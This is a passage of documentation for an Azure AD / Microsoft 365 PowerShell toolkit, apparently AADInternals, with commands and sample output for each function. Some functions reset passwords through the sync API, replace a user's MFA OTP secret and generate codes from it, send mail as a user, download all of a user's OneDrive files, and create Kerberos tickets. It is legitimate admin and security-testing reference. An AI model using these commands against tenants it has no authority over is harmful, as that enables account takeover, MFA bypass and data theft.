Since version 0.4.3
Disables Msol PowerShell module access for the user’s tenant.

Example:

# Get the access token
Get-AADIntAccessTokenForMSGraph -SaveToCache

# Disable the Msol PowerShell module access
Disable-AADIntTenantMsolAccess

# Check the settings after 10 seconds or so.
Get-AADIntTenantAuthPolicy | Select block*

Output:

blockMsolPowerShell
-------------------
              True

Utilities

Utilities provide the functionality for troubleshooting etc.

Read-AADIntAccesstoken (*)

This function show access (and id and refresh) token information. For debugging, the most important values are the audience (aud) and the issuer (iss). Use -validate switch to validate the signature and to check the expiration.

You can also show details from the token copied from the browser session’s authorization -header.

Example1:

# Show access token information
$at = Get-AADIntAccessTokenForAADGraph
Read-AADIntAccesstoken $at

Output1:

aud                 : https://graph.windows.net
iss                 : https://sts.windows.net/fe177079-66f4-4f9f-bcb6-e085b92e3c8a/
iat                 : 1540478026
nbf                 : 1540478026
exp                 : 1540481926
acr                 : 1
aio                 : ASQA2/8JAAAAXhS3vMo2OGlXvBZG0tScm9njsJUDhvoHtwdSlUx2Jvg=
amr                 : {pwd}
appid               : 1b730954-1685-4b74-9bfd-dac224a7b894
appidacr            : 0
family_name         : demo
given_name          : admin
ipaddr              : 127.0.0.1
name                : admin demo
oid                 : 69be7da7-e29f-4753-b8c7-0417a63a1804
puid                : 1003BFFDABE606EE
scp                 : user_impersonation
sub                 : SaN7kFxdXhzQN6B7C8ThGEg4gBIrcXo3lzcayeoReps
tenant_region_scope : EU
tid                 : 6217f557-602d-4fc8-b2f9-5cb948f6ce26
unique_name         : admin@company.onmicrosoft.com
upn                 : admin@company.onmicrosoft.com
uti                 : bH3Bzy9D5ESLcW_S0KkoAA
ver                 : 1.0

Example2:

# Show access token information
Read-AADIntAccesstoken $at -Validate

Output1:

Read-Accesstoken : Access Token is expired
    At line:1 char:1
    + Read-Accesstoken -AccessToken $at -Validate -verbose
    + ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
        + CategoryInfo          : NotSpecified: (:) [Write-Error], WriteErrorException
        + FullyQualifiedErrorId : Microsoft.PowerShell.Commands.WriteErrorException,Read-Accesstoken
        
aud                 : https://graph.windows.net
iss                 : https://sts.windows.net/fe177079-66f4-4f9f-bcb6-e085b92e3c8a/
iat                 : 1540478026
nbf                 : 1540478026
exp                 : 1540481926
acr                 : 1
aio                 : ASQA2/8JAAAAXhS3vMo2OGlXvBZG0tScm9njsJUDhvoHtwdSlUx2Jvg=
amr                 : {pwd}
appid               : 1b730954-1685-4b74-9bfd-dac224a7b894
appidacr            : 0
family_name         : demo
given_name          : admin
ipaddr              : 127.0.0.1
name                : admin demo
oid                 : 69be7da7-e29f-4753-b8c7-0417a63a1804
puid                : 1003BFFDABE606EE
scp                 : user_impersonation
sub                 : SaN7kFxdXhzQN6B7C8ThGEg4gBIrcXo3lzcayeoReps
tenant_region_scope : EU
tid                 : 6217f557-602d-4fc8-b2f9-5cb948f6ce26
unique_name         : admin@company.onmicrosoft.com
upn                 : admin@company.onmicrosoft.com
uti                 : bH3Bzy9D5ESLcW_S0KkoAA
ver                 : 1.0

Get-AADIntCertificate (*)

This function loads certificate from a .pfx file to a variable. Used to create SAML tokens.

Example:

# Load certificate to a variable
$cert = Get-AADIntCertificate -FileName 'C:\temp\cert.pfx' -Password 'mypassword'

Output:

Thumbprint                                Subject                                                                                                                                                                                                    
----------                                -------                                                                                                                                                                                                    
7fb507489addeee4dff2f64c68d1970c28b0da62  CN=sign.company.com, O=Company, S=Alaska, C=US

Get-AADIntImmutableID (*)

This function returns ImmutableId for the given ADUser -object. Must be run on a computer having ActiveDirectory -module

Example:

# Get ImmutableId for a ADUser
Get-AADIntAccessTokenForCloudShell -SaveToCache

Output:

Zjk1OGUxZTctNDE4ZS00Njk5LTg1ZjgtN2YyNGM2NTcwNW==

Start-AADIntCloudShell ( C)

Since version 0.4.3
Starts an Azure Cloud Shell (PowerShell) session for the given user. Use -shell bash parameter to start Bash session.

Note! Does not work with VSCode or ISE.

Example:

# Get access token and save to cache
Get-AADIntAccessTokenForCloudShell -SaveToCache

# Start the cloud shell (PowerShell)
Start-AADIntCloudShell

User manipulation

User manipulation functions provide the basic user adding/editing/deleting functionality and some extras.

Get-AADIntUsers (A)

This function returns users of the tenant.

Example:

# Get users
Get-AADIntUsers | Select UserPrincipalName,ObjectId,ImmutableId

Output:

UserPrincipalName                                               ObjectId                             ImmutableId             
-----------------                                               --------                             -----------  
LeeG@company.com                                                2eee0a36-9e2f-4985-80e1-4172ed8b3213 7jYndBUFCEqlXQNZEO3uwQ==
LidiaH@company.com                                              34289155-2798-432d-9398-53e7e0918f38 W3clIieLs0ivUeoY1lu1fg==
AllanD@company.com                                              3a0eea57-9f74-4ee5-8e84-353c35581cc2 BzPotuy3G0ySBJN5tZwB4w==

Get-AADIntUser (A)

This function returns information for the given user.

Example:

# Get user information
Get-AADIntUser 

Output:

AlternateEmailAddresses                : 
AlternateMobilePhones                  : 
AlternativeSecurityIds                 : 
BlockCredential                        : false
City                                   : 
CloudExchangeRecipientDisplayType      : 1073741824
Country                                : 
Department                             : Manufacturing
DirSyncProvisioningErrors              : 
DisplayName                            : Lee Gu
Errors                                 : 
Fax                                    : 
FirstName                              : Lee
ImmutableId                            : 7jYndBUFCEqlXQNZEO3uwQ==
IndirectLicenseErrors                  : 
IsBlackberryUser                       : false
IsLicensed                             : true
LastDirSyncTime                        : 2018-06-26T11:04:16Z
LastName                               : Gu
LastPasswordChangeTimestamp            : 2017-10-03T04:44:43Z
LicenseAssignmentDetails               : LicenseAssignmentDetails
LicenseReconciliationNeeded            : false
Licenses                               : Licenses
LiveId                                 : 1003BFFDABE61DB7
MSExchRecipientTypeDetails             : 
MSRtcSipDeploymentLocator              : 
MSRtcSipPrimaryUserAddress             : 
MobilePhone                            : 
OathTokenMetadata                      : 
ObjectId                               : 2eee0a36-9e2f-4985-80e1-4172ed8b3213
Office                                 : 23/3101
OverallProvisioningStatus              : PendingInput
PasswordNeverExpires                   : true
PasswordResetNotRequiredDuringActivate : true
PhoneNumber                            : +1 913 555 0101
PortalSettings                         : 
PostalCode                             : 66210
PreferredDataLocation                  : 
PreferredLanguage                      : 
ProxyAddresses                         : ProxyAddresses
ReleaseTrack                           : 
ServiceInformation                     : 
SignInName                             : LeeG@company.com
SoftDeletionTimestamp                  : 
State                                  : KS
StreetAddress                          : 10801 Mastin Blvd., Suite 620
StrongAuthenticationMethods            : 
StrongAuthenticationPhoneAppDetails    : 
StrongAuthenticationProofupTime        : 
StrongAuthenticationRequirements       : 
StrongAuthenticationUserDetails        : 
StrongPasswordRequired                 : true
StsRefreshTokensValidFrom              : 2017-10-03T04:44:43Z
Title                                  : Director
UsageLocation                          : FI
UserLandingPageIdentifierForO365Shell  : 
UserPrincipalName                      : LeeG@company.com
UserThemeIdentifierForO365Shell        : 
UserType                               : Member
ValidationStatus                       : Healthy
WhenCreated                            : 2018-06-26T11:04:14Z

New-AADIntUser (A)

This function creates a new user. Currently supports only UserPrincipalName and DisplayName.

Example:

# Get login information for a domain
New-AADIntUser -UserPrincipalName "user@company.com" -DisplayName "New User"

Output:

AlternateEmailAddresses                : 
AlternateMobilePhones                  : 
AlternativeSecurityIds                 : 
BlockCredential                        : false
City                                   : 
CloudExchangeRecipientDisplayType      : 
Country                                : 
Department                             : 
DirSyncProvisioningErrors              : 
DisplayName                            : New User
Errors                                 : 
Fax                                    : 
FirstName                              : 
ImmutableId                            : 
IndirectLicenseErrors                  : 
IsBlackberryUser                       : false
IsLicensed                             : false
LastDirSyncTime                        : 
LastName                               : 
LastPasswordChangeTimestamp            : 2018-10-25T15:13:10.8686574Z
LicenseAssignmentDetails               : 
LicenseReconciliationNeeded            : false
Licenses                               : 
LiveId                                 : 1003BFFDAEE167C0
MSExchRecipientTypeDetails             : 
MSRtcSipDeploymentLocator              : 
MSRtcSipPrimaryUserAddress             : 
MobilePhone                            : 
OathTokenMetadata                      : 
ObjectId                               : 13e121db-4132-43c8-a784-a9b12f2bd4e3
Office                                 : 
OverallProvisioningStatus              : None
PasswordNeverExpires                   : false
PasswordResetNotRequiredDuringActivate : 
PhoneNumber                            : 
PortalSettings                         : 
PostalCode                             : 
PreferredDataLocation                  : 
PreferredLanguage                      : 
ProxyAddresses                         : 
ReleaseTrack                           : 
ServiceInformation                     : 
SignInName                             : new.user@company.com
SoftDeletionTimestamp                  : 
State                                  : 
StreetAddress                          : 
StrongAuthenticationMethods            : 
StrongAuthenticationPhoneAppDetails    : 
StrongAuthenticationProofupTime        : 
StrongAuthenticationRequirements       : 
StrongAuthenticationUserDetails        : 
StrongPasswordRequired                 : true
StsRefreshTokensValidFrom              : 2018-10-25T15:13:10.8686574Z
Title                                  : 
UsageLocation                          : 
UserLandingPageIdentifierForO365Shell  : 
UserPrincipalName                      : new.user@company.com
UserThemeIdentifierForO365Shell        : 
UserType                               : Member
ValidationStatus                       : Healthy
WhenCreated                            : 
Password                               : Tog59451

Set-AADIntUser (A)

This function changes user’s information.

Example:

# Set user information
Set-AADIntUser -UserPrincipalName "user@company.com" -FirstName "Dave"

Remove-AADIntUser (A)

This function removes a user.

Example:

# Remove the user
Remove-AADIntUser -UserPrincipalName "user@company.com"

Get-AADIntGlobalAdmins (A)

This function returns all Global Admins of the tenant.

Example:

# Get global admins
Get-AADIntGlobalAdmins

Output:

DisplayName    UserPrincipalName                 
-----------    -----------------                 
admin demo     admin@company.onmicrosoft.com
Dave the Admin dave@company.com            

User MFA manipulation

Get-AADIntUserMFA (A)

Since version 0.2.8
Gets user’s MFA settings

Example:

# Get the access token
Get-AADIntAccessTokenForAADGraph -SaveToCache
    
# Get user's MFA settings 
Get-AADIntUserMFA -UserPrincipalName user@company.com

Output:

UserPrincipalName      : user@company.com
State                  : Enforced
PhoneNumber            : +1 123456789
AlternativePhoneNumber : +358 123456789
Email                  : someone@hotmail.com
DefaultMethod          : OneWaySMS
Pin                    : 
OldPin                 : 
StartTime              :          

Set-AADIntUserMFA (A)

Since version 0.2.8
Sets user’s MFA settings

Example:

# Get the access token
Get-AADIntAccessTokenForAADGraph -SaveToCache
    
# Set user's MFA settings 
Set-AADIntUserMFA -UserPrincipalName "user@company.com" -PhoneNumber "+1 123456789" -DefaultMethod PhoneAppNotification

Get-AADIntUserMFAApps (A)

Since version 0.4.0
Gets user’s MFA Authentication App settings

Example:

# Get the access token
Get-AADIntAccessTokenForAADGraph -SaveToCache
    
# Get user's MFA apps settings 
Get-AADIntUserMFAApps -UserPrincipalName "user@company.com"

Output:

AuthenticationType : Notification, OTP
DeviceName         : SM-R2D2
DeviceTag          : SoftwareTokenActivated
DeviceToken        : APA91...
Id                 : 454b8d53-d97e-4ead-a69c-724166394334
NotificationType   : GCM
OathTokenTimeDrift : 0
OathSecretKey      :
PhoneAppVersion    : 6.2001.0140
TimeInterval       :

AuthenticationType : OTP
DeviceName         : NO_DEVICE
DeviceTag          : SoftwareTokenActivated
DeviceToken        : NO_DEVICE_TOKEN
Id                 : aba89d77-0a69-43fa-9e5d-6f41c7b9bb16
NotificationType   : Invalid
OathTokenTimeDrift : 0
OathSecretKey      :
PhoneAppVersion    : NO_PHONE_APP_VERSION
TimeInterval       :         

Set-AADIntUserMFAApps (A)

Since version 0.4.0
Sets user’s MFA Authentication App settings.

Example:

# Set user's MFA apps settings 
Set-AADIntUserMFAApps -UserPrincipalName "user@company.com" -Id 454b8d53-d97e-4ead-a69c-724166394334 -DeviceName "SM-3CPO"

New-AADIntOTPSecret

Since version 0.4.0
Generates a one-time-password (OTP) secret which can be used to reset user’s OathSecretKey.

Note! Set only to “apps” which AuthenticationType is OTP!

Example 1:

# Generate a new OTP secret 
New-AADIntOTPSecret
Output:

njny7gdb6tnfihy3
# Change the user's OathSecretKey 
Set-AADIntUserMFAApps -UserPrincipalName "user@company.com" -Id aba89d77-0a69-43fa-9e5d-6f41c7b9bb16 -OathSecretKey "njny7gdb6tnfihy3"

Example 2:

# Generate OTP secret 
New-AADIntOTPSecret -Clipboard
Output

OTP secret copied to clipboard.

New-AADIntOTP

Since version 0.4.0
Generates a one-time-password (OTP) using the given secret. Can be used for MFA if the user’s secret is known.

Example 1:

# Generate OTP 
New-AADIntOTP -SecretKey "rrc2 wntz dkbu iikb"
Output:

OTP     Valid
---     -----
502 109 26s

Example 2:

# Generate OTP 
New-AADIntOTP -SecretKey "rrc2 wntz dkbu iikb" -Clipboard
Output:

OTP copied to clipboard, valid for 26s

User manipulation with AD sync api

These functions provide some functionality allowing manipulation of Azure AD objects otherwise impossible.

NOTE! these function uses Azure AD synchronization API and may cause severe harm to the tenant!! USE ON YOUR OWN RISK!

Get-AADIntSyncObjects (A)

This function returns all Azure AD objects that are not synced to the on-premises AD.

Example:

# Get synchronisable objects from AAD
Get-AADIntSyncObjects | Select UserPrincipalName

Output:

UserPrincipalName          
-----------------          
BrianJ@company.com            
LynneR@company.com                        
MiriamG@company.com                       
AllanD@company.com                        
IsaiahL@company.com               

Set-AADIntAzureADObject (A)

This function creates new OR modifies existing Azure AD object.

Allows setting all Azure AD attributes. The sourceAnchor attribute is the most important one and is automatically set only to synced users. This is typically the ImmutableID (Base64 encoded on-prem AD object’s GUID), but can be any string that is unique tenant wide.

Example:

# Create a new user
Set-AADIntAzureADObject -userPrincipalName "someone@company.com" -sourceAnchor "ABC" -netBiosName

Output:

CloudAnchor            : User_d14f7322-c997-4e87-912b-f43c906cec81
ErrorDetails           : ErrorDetails
ObjectType             : User
ResultCode             : Success
ResultErrorCode        : 0
ResultErrorDescription : ResultErrorDescription
SourceAnchor           : ABC
SyncOperation          : Add

Remove-AADIntAzureADObject (A)

This function removes an AAD object.

Example:

# Remove AAD object
Remove-AADIntAzureADObject -sourceAnchor ABC

Output:

CloudAnchor            : User_d14f7322-c997-4e87-912b-f43c906cec81
ErrorDetails           : ErrorDetails
ObjectType             : User
ResultCode             : Success
ResultErrorCode        : 0
ResultErrorDescription : ResultErrorDescription
SourceAnchor           : ABC
SyncOperation          : Add

Set-AADIntUserPassword (A)

This function sets the user’s password. Also the last change time can be set, must be before the current time.

Example:

# Set the password and the change date to 1/1/1970
Set-AADIntUserPassword -SourceAnchor qIMPTm2Q3kimHgg4KQyveA== -Password "a" -ChangeDate 1/1/1970

Output: (Result 0 = success)

CloudAnchor Result SourceAnchor            
----------- ------ ------------            
CloudAnchor 0      qIMPTm2Q3kimHgg4KQyveA==

Example:

# Set the password and the change date to 1/1/1970
Set-AADIntUserPassword -CloudAnchor "User_60f87269-f258-4473-8cca-267b50110e7a" -Password "a" -ChangeDate 1/1/1970

Output: (Result 0 = success)

CloudAnchor                               Result SourceAnchor            
-----------                               ------ ------------            
User_60f87269-f258-4473-8cca-267b50110e7a 0      SourceAnchor

Reset-AADIntServiceAccount (A)

This function creates a new service account (or reset the password for existing one). The created user will have DirectorySynchronizationAccount role.

Azure AD Connect uses this during the configuration stage to create the service account and stores the username and password to the configuration database.

Example:

# Create a new service account for AD sync
Reset-AADIntServiceAccount -ServiceAccount Sync_MyServer_nnnnnnn

Output:

Password         UserName                                          
--------         --------                                          
5(]lCy=Q{.#@lb}p Sync_MyServer_nnnnnnn@company.onmicrosoft.com

Exchange Online functions

Eachange Online functions are used to manipulate devices and send mail using ActiveSync and Outlook APIs. Functions marked with E uses Exchange Online access token.

Get-AADIntEASAutoDiscover (*)

Since version 0.1.6
Returns endpoints for the given protocol for the given email address. If the email address is invalid (i.e. the user does not exists) this takes ages..

Example:

# Get endpoint for EWS api
Get-AADIntEASAutoDiscover -Email "some.user@company.com" -Protocol Ews

Output:

Protocol  Url                         
--------  ---                         
Substrate https://substrate.office.com

Get-AADIntEASAutoDiscoverV1 (E)

Since version 0.1.6
Returns ActiveSync endpoint for the given user (credentials or access token).

Example:

# Get credentials
$Cred=Get-Credential
# Get endpoint for ActiveSync
Get-AADIntEASAutoDiscoverV1 -Credentials $Cred

Output:

https://outlook.office365.com/Microsoft-Server-ActiveSync

Set-AADIntEASSettings (E)

Since version 0.1.6
Adds new or modifies existing ActiveSync device for the given user (credentials or access token). The added or modified device can be used to send emails with Send-AADIntEASMessage

Example:

# Get credentials
$Cred=Get-Credential
# Create a device
Set-AADIntEASSettings -Credentials $Cred -DeviceId android01234 -DeviceType Android -Model "Android 01234" -PhoneNumber "+1234567890"

Output:

<Settings xmlns="Settings"><Status>1</Status><DeviceInformation><Status>1</Status></DeviceInformation></Settings>

Get-AADIntMobileDevices (E)

Since version 0.1.6
Gets mobile devices from Exchange Online. Devices can be used to send emails with Send-AADIntEASMessage

Example:

# Get credentials
$Cred=Get-Credential
# Get Mobile Devices
Get-AADIntMobileDevices -Credentials $Cred | select DeviceId,DeviceType,ClientType,UserDisplayname

Output:

DeviceId     DeviceType                 ClientType UserDisplayName                                                 
--------     ----------                 ---------- ---------------                                                 
430847304    TestActiveSyncConnectivity EAS        EURP189A002.PROD.OUTLOOK.COM/Microsoft Exchange Hosted Organizat
android01234 Android                    EAS        EURP189A002.PROD.OUTLOOK.COM/Microsoft Exchange Hosted Organizat

Send-AADIntEASMessage (E)

Since version 0.1.6
Sends an email from the given user via ActiveSync using the given device.

Example:

# Get credentials
$Cred=Get-Credential
# Send an email
Send-AADIntEASMessage -Credentials $Cred -DeviceId android01234 -DeviceType Android -Recipient "someone@company.com" -Subject "An email" -Message "<h2>This is a message!</h2>"

Output:

WARNING: Message was not Base64 encoded, converting..

Send-AADIntOutlookMessage (E)

Since version 0.1.6
Sends an email from the given user via Outlook API.

Example:

# Get accesstoken
$At=Get-AADIntAccessTokenForEXO
# Create the email
Send-AADIntOutlookMessage -AccessToken $At -Recipient "someone@company.com" -Subject "An email" -Message "<h2>This is a message!</h2>"

SharePoint Online functions

Eachange Online functions are used to retrieve information of users and groups of SharePoint sites.

Get-AADIntSPOSiteUsers (S)

Since version 0.2.4
Returns users of the given site. Only visitor (read-access) is needed :)

Example:

# Get site users
$ah=Get-AADIntSPOAuthenticationHeader -Site https://company.sharepoint.com
Get-AADIntSPOSiteUsers -Site https://company.sharepoint.com -AuthHeader $ah

Output:

IsSiteAdmin                    : True
Id                             : 17
LoginName                      : c:0t.c|tenant|a200e3ee-47d0-4b9b-99c6-554b85823042
PrincipalType                  : 4
IsEmailAuthenticationGuestUser : False
UserPrincipalName              : 
IsShareByEmailGuestUser        : False
IsHiddenInUI                   : False
NameId                         : 
NameIdIssuer                   : 
Title                          : SharePoint Service Administrator
Email                          : 

IsSiteAdmin                    : False
Id                             : 1073741823
LoginName                      : SHAREPOINT\system
PrincipalType                  : 1
IsEmailAuthenticationGuestUser : False
UserPrincipalName              : 
IsShareByEmailGuestUser        : False
IsHiddenInUI                   : False
NameId                         : S-1-0-0
NameIdIssuer                   : urn:offic€:idp:activedirectory
Title                          : System Account
Email                          : 

IsSiteAdmin                    : False
Id                             : 23
LoginName                      : i:0#.f|membership|user@company.com
PrincipalType                  : 1
IsEmailAuthenticationGuestUser : False
UserPrincipalName              : user@company.com
IsShareByEmailGuestUser        : False
IsHiddenInUI                   : False
NameId                         : 10030000b5466d52
NameIdIssuer                   : urn:federation:microsoftonline
Title                          : user
Email                          : user@company.com

Get-AADIntSPOUserProperties (S)

Since version 0.2.4
Returns detailed information of the given user. Only visitor (read-access) is needed :)

Note: the user’s name must be in SharePoint “LoginName” format as above.

Example:

# Get site users
$ah=Get-AADIntSPOAuthenticationHeader -Site https://company.sharepoint.com
Get-AADIntSPOUserProperties -Site https://company.sharepoint.com -AuthHeader $ah -User "i:0#.f|membership|user@company.com"

Output:

Updated                            : 2019-08-16T07:59:30Z
Author                             : 
AccountName                        : i:0#.f|membership|user@company.com
DirectReports                      : 
DisplayName                        : user
Email                              : user@company.com
ExtendedManagers                   : 
ExtendedReports                    : i:0#.f|membership|user@company.com
IsFollowed                         : False
Peers                              : 
PersonalUrl                        : https://company-my.sharepoint.com/personal/user_company_com/
PictureURL                         : 
UserUrl                            : https://company-my.sharepoint.com:443/Person.aspx?accountname=i:0#.f|membership|user@company.com
Title                              : 
UserProfile_GUID                   : f6b3014d-c4d7-4775-a37c-1e6f14fa98f9
SID                                : i:0h.f|membership|10030000a5566b50@live.com
ADGuid                             : System.Byte[]
FirstName                          : 
SPS-PhoneticFirstName              : 
LastName                           : 
SPS-PhoneticLastName               : 
PreferredName                      : user
SPS-PhoneticDisplayName            : 
WorkPhone                          : 
Department                         : 
SPS-Department                     : 
Manager                            : 
AboutMe                            : 
PersonalSpace                      : /personal/user_company_com/
UserName                           : user@company.com
QuickLinks                         : 
WebSite                            : 
PublicSiteRedirect                 : 
SPS-JobTitle                       : 
SPS-Dotted-line                    : 
SPS-Peers                          : 
SPS-Responsibility                 : 
SPS-SipAddress                     : user@company.com
SPS-MySiteUpgrade                  : 
SPS-ProxyAddresses                 : 
SPS-HireDate                       : 
SPS-DisplayOrder                   : 
SPS-ClaimID                        : user@company.com
SPS-ClaimProviderID                : membership
SPS-ResourceSID                    : 
SPS-ResourceAccountName            : 
SPS-MasterAccountName              : 
SPS-UserPrincipalName              : user@company.com
SPS-O15FirstRunExperience          : 
SPS-PersonalSiteInstantiationState : 2
SPS-DistinguishedName              : CN=abf7eff8-59a5-456f-a723-976f07b14420,OU=a200e3ee-47d0-4b9b-99c6-554b85823042,OU=Tenants,OU=MSO
                                     nline,DC=SPODS44818354,DC=msoprd,DC=msft,DC=net
SPS-SourceObjectDN                 : 
SPS-ClaimProviderType              : Forms
SPS-SavedAccountName               : SPODS44833354\$JUHIC0-TJJO02Q7PVM2
SPS-SavedSID                       : System.Byte[]
SPS-ObjectExists                   : 
SPS-PersonalSiteCapabilities       : 4
SPS-PersonalSiteFirstCreationTime  : 10/2/2017 5:50:10 PM
SPS-PersonalSiteLastCreationTime   : 10/2/2017 5:50:10 PM
SPS-PersonalSiteNumberOfRetries    : 1
SPS-PersonalSiteFirstCreationError : 
SPS-FeedIdentifier                 : 
WorkEmail                          : user@company.com
CellPhone                          : 
Fax                                : 
HomePhone                          : 
Office                             : 
SPS-Location                       : 
Assistant                          : 
SPS-PastProjects                   : 
SPS-Skills                         : 
SPS-School                         : 
SPS-Birthday                       : 
SPS-StatusNotes                    : 
SPS-Interests                      : 
SPS-HashTags                       : 
SPS-EmailOptin                     : 
SPS-PrivacyPeople                  : True
SPS-PrivacyActivity                : 4095
SPS-PictureTimestamp               : 
SPS-PicturePlaceholderState        : 
SPS-PictureExchangeSyncState       : 
SPS-TimeZone                       : 
OfficeGraphEnabled                 : 
SPS-UserType                       : 0
SPS-HideFromAddressLists           : False
SPS-RecipientTypeDetails           : 
DelveFlags                         : 
msOnline-ObjectId                  : abf7eff8-59a5-456f-a723-976f07b14420
SPS-PointPublishingUrl             : 
SPS-TenantInstanceId               : 
SPS-SharePointHomeExperienceState  : 
SPS-MultiGeoFlags                  : 
PreferredDataLocation              : 

Get-AADIntSPOSiteGroups (S)

Since version 0.2.4
Returns groups of the given site. Only visitor (read-access) is needed :)

Example:

# Get site groups
$ah=Get-AADIntSPOAuthenticationHeader -Site https://company.sharepoint.com
Get-AADIntSPOSiteGroups -Site https://company.sharepoint.com -AuthHeader $ah

Output:

AllowRequestToJoinLeave        : False
Id                             : 3
LoginName                      : Excel Services Viewers
AllowMembersEditMembership     : False
AutoAcceptRequestToJoinLeave   : False
PrincipalType                  : 8
OnlyAllowMembersViewMembership : True
IsHiddenInUI                   : False
Description                    : 
Title                          : Excel Services Viewers
OwnerTitle                     : System Account

AllowRequestToJoinLeave        : False
Id                             : 19
LoginName                      : SharePointHome OrgLinks Admins
AllowMembersEditMembership     : False
AutoAcceptRequestToJoinLeave   : False
PrincipalType                  : 8
OnlyAllowMembersViewMembership : True
IsHiddenInUI                   : False
Description                    : 
Title                          : SharePointHome OrgLinks Admins
OwnerTitle                     : SharePointHome OrgLinks Admins

AllowRequestToJoinLeave        : False
Id                             : 20
LoginName                      : SharePointHome OrgLinks Editors
AllowMembersEditMembership     : False
AutoAcceptRequestToJoinLeave   : False
PrincipalType                  : 8
OnlyAllowMembersViewMembership : True
IsHiddenInUI                   : False
Description                    : 
Title                          : SharePointHome OrgLinks Editors
OwnerTitle                     : SharePointHome OrgLinks Editors

AllowRequestToJoinLeave        : False
Id                             : 21
LoginName                      : SharePointHome OrgLinks Viewers
AllowMembersEditMembership     : False
AutoAcceptRequestToJoinLeave   : False
PrincipalType                  : 8
OnlyAllowMembersViewMembership : True
IsHiddenInUI                   : False
Description                    : 
Title                          : SharePointHome OrgLinks Viewers
OwnerTitle                     : SharePointHome OrgLinks Admins

AllowRequestToJoinLeave        : False
Id                             : 9
LoginName                      : Team Site Members
AllowMembersEditMembership     : True
AutoAcceptRequestToJoinLeave   : False
PrincipalType                  : 8
OnlyAllowMembersViewMembership : False
IsHiddenInUI                   : False
Description                    : 
Title                          : Team Site Members
OwnerTitle                     : Team Site Owners

AllowRequestToJoinLeave        : False
Id                             : 7
LoginName                      : Team Site Owners
AllowMembersEditMembership     : False
AutoAcceptRequestToJoinLeave   : False
PrincipalType                  : 8
OnlyAllowMembersViewMembership : False
IsHiddenInUI                   : False
Description                    : 
Title                          : Team Site Owners
OwnerTitle                     : Team Site Owners

AllowRequestToJoinLeave        : False
Id                             : 8
LoginName                      : Team Site Visitors
AllowMembersEditMembership     : False
AutoAcceptRequestToJoinLeave   : False
PrincipalType                  : 8
OnlyAllowMembersViewMembership : False
IsHiddenInUI                   : False
Description                    : 
Title                          : Team Site Visitors
OwnerTitle                     : Team Site Owners

OneDrive for Business functions

OneDrive functions are used to download, send, and modify files using OneDrive for Business APIs.

New-AADIntOneDriveSettings

Since version 0.2.7
Creates a new OneDriveSettings object used with other OneDrive for Business functions.

To create new settings using interactive authentication (promtps twice for both OfficeApps and OneDrive APIs):

Example:

# Create a new OneDriveSettings object
$os = New-AADIntOneDriveSettings

To create new settings using Kerberos tickets:

Example:

# Create a Kerberos ticket
$kt=New-AADIntKerberosTicket -ADUserPrincipalName user@company.com -Password "mypassword"

# Create a new OneDriveSettings object using Kerberos ticket
$os = New-AADIntOneDriveSettings -KerberosTicket $kt

Get-AADIntOneDriveFiles (O)

Since version 0.2.7
Downloads user’s OneDrive for Business files (all of them).

Besides downloading the files, the following information is returned per file.

Attribute Description
Path The relative path of the file or folder
Size Size in bytes
ETag Resource id and the next version number of the file in format “{},
Created The time when the file was created
Modified The time when the file was modified
ResourceID The unique id of the file or folder
MimeType The mime type of the file
Url The “pre-authenticated” url of the file
XORHash Xor-hash value of the file

Note! If you only want to list the files and folders, use -PrintOnly switch. If sync is restricted to only the members of specific domain(s), use the -DomainGuid parameter.

To download user’s OneDrive files, use the following commands:

Example:

# Create a new OneDriveSettings object
$os = New-AADIntOneDriveSettings

# Download the contents of the OneDrive to the current folder    
Get-AADIntOneDriveFiles -OneDriveSettings $os | Format-Table

Output:

Path                              Size  Created            Modified           ResourceID                   
----                              ----  -------            --------           ----------                   
\RootFolder\Document1.docx        11032 2.12.2019 20.47.23 2.12.2019 20.48.46 5e7acf393a2e45f18c1ce6caa7...
\RootFolder\Book.xlsx             8388  2.12.2019 20.49.14 2.12.2019 20.50.14 b26c0a38d4d14b23b785576e29...
\RootFolder\Docs\Document1.docx   84567 9.12.2019 11.24.40 9.12.2019 12.17.50 d9d51e47b66c4805aff3a08763...
\RootFolder\Docs\Document2.docx   31145 7.12.2019 17.28.37 7.12.2019 17.28.37 972f9c317e1e468fb2b6080ac2...

Send-AADIntOneDriveFile (O)

Since version 0.2.7
Sends a local file to user’s OneDrive to a specific folder.

Note! To send file, you need ResourceId of the folder you are sending the file.

Note! If sync is restricted to only the members of specific domain(s), use the -DomainGuid parameter.

To send a file to user’s OneDrive to Documents folder:

Example:

# Create a new OneDriveSettings object
$os = New-AADIntOneDriveSettings

# List folders and their resource ids:
Get-AADIntOneDriveFiles -OneDriveSettings $os -PrintOnly -FoldersOnly | select Path,ResourceID

Path                  ResourceID                      
----                  ----------                      
\RootFolder           1679e14635404542880e3885b4374c3f
\RootFolder\Documents a2a54a01b586480ebbddf04cfaa36191
\RootFolder\Sales     bd59baa485a2411e951234fe6cbd8c5d
# Send the file to Documents folder
Send-AADIntOneDriveFile -OneDriveSettings $os -FileName .\Document.docx -FolderId "a2a54a01b586480ebbddf04cfaa36191"

Output:

ResourceID                            : 32b66e08379d4c448e001e9659777c71
ETag                                  : "{32B66E08-379D-4C44-8E00-1E9659777C71},2"
DateModified                          : 2019-12-11T11:18:38.0000000Z
RelationshipName                      : Document.docx
ParentResourceID                      : a2a54a01b586480ebbddf04cfaa36191
fsshttpstate.xschema.storage.live.com : fsshttpstate.xschema.storage.live.com
DocumentStreams                       : DocumentStreams
WriteStatus                           : Success

If the file exists etc. you’ll get following error or similar:

RelationshipName ParentResourceID                 WriteStatus      
---------------- ----------------                 -----------      
Document         a2a54a01b586480ebbddf04cfaa36191 ItemAlreadyExists

To update existing file, you also need to know the ETag: Example:

# Update the file to Documents folder
Send-AADIntOneDriveFile -OneDriveSettings $os -FileName .\Document.docx -FolderId "a2a54a01b586480ebbddf04cfaa36191" -ETag "{32B66E08-379D-4C44-8E00-1E9659777C71},2"

Output:

ResourceID                            : 32b66e08379d4c448e001e9659777c71
ETag                                  : "{32B66E08-379D-4C44-8E00-1E9659777C71},3"
DateModified                          : 2019-14-11T12:08:55.0000000Z
RelationshipName                      : Document.docx
ParentResourceID                      : a2a54a01b586480ebbddf04cfaa36191
fsshttpstate.xschema.storage.live.com : fsshttpstate.xschema.storage.live.com
DocumentStreams                       : DocumentStreams
WriteStatus                           : Success

Teams functions

Teams functions are used to send and delete Teams messages.

Get-AADIntSkypeToken (T)

Since version 0.4,4
Gets SkypeToken used for authentication for certain Teams services.

Example:

# Get access token for teams and save to cache
Get-AADIntAccessTokenForTeams -SaveToCache

